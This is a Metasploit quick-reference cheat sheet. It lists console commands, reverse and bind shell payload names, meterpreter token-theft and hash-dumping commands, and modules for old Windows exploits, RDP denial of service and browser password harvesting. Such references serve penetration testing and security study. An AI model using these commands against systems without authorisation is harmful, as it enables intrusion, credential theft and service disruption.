(1) Metasploit Commands (help: -h)

  1. msfconsole msfpayload msfvenom msfencode msfupdate db_connect db_status db_rebuild_cache db_export db_import help clear exit quit
  2. search use set setg show threads run exploit rexploit sessions route
  3. hosts services vulns loot notes creds resource
  4. [...SNIP...]

(2) Msfpayload Lists (help: -h | list: -l)

  1. Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]|s[O]>
  2. windows/shell_reverse_tcp
  3. windows/meterpreter/bind_tcp
  4. windows/meterpreter/reverse_tcp
  5. windows/x64/meterpreter/bind_tcp
  6. windows/x64/meterpreter/reverse_tcp
  7. linux/x86/shell_reverse_tcp
  8. linux/x86/meterpreter/reverse_tcp
  9. [...SNIP...]

(3) Meterpreter Commands (help: -h)

  1. use load getuid getsystem hashdump ps shell migrate background run
  2. execute -H -f D:\\temp\\tmp\\Cookies\\csc.exe -a '/c whoami'
  3. use incognito //load the incognito extension (used to steal tokens from the target host or impersonate users)
  4. list_tokens -u //list the available user tokens on the target host
  5. list_tokens -g //list the available group tokens on the target host
  6. impersonate_token DOMAIN_NAME\\USERNAME //impersonate an available token on the target host
  7. steal_token PID //steal the available token of the given process and impersonate it
  8. drop_token //stop impersonating the current token
  9. rev2self //calls RevertToSelf() on the remote machine
  10. [...SNIP...]

(4) Metasploit Modules (show options)

  1. exploit/multi/handler //handler that receives the payload connection
  2. exploit/windows/smb/smb_login
  3. exploit/windows/smb/psexec
  4. exploit/windows/smb/ms08_067_netapi //MS08_067
  5. exploit/windows/browser/ms12_004_midi //MS12_004
  6. exploit/windows/local/ms_ndproxy //MS14_002
  7. exploit/windows/local/ms14_058_track_popup_menu //MS14_058
  8. auxiliary/dos/windows/rdp/ms12_020_maxchannelids //MS12_020 (RDP blue screen)
  9. exploit/windows/browser/adobe_flash_pixel_bender_bof
  10. post/multi/gather/lastpass_creds //retrieve passwords saved in the host's browser
  11. post/windows/manage/enable_support_account //clone a system user
  12. auxiliary/admin/mssql/mssql_escalate_dbowner
  13. post/windows/gather/smart_hashdump

References

  1. exploit/windows/mysql/mysql_payload
  2. http://eromang.zataz.com/2011/03/10/oracle-mysql-udf-for-microsoft-windows-metasploit-payload-execution/
  3. Hack ALL Security Features in Remote Windows 7 PC
  4. http://www.hackingarticles.in/hack-all-security-features-in-remote-windows-7-pc
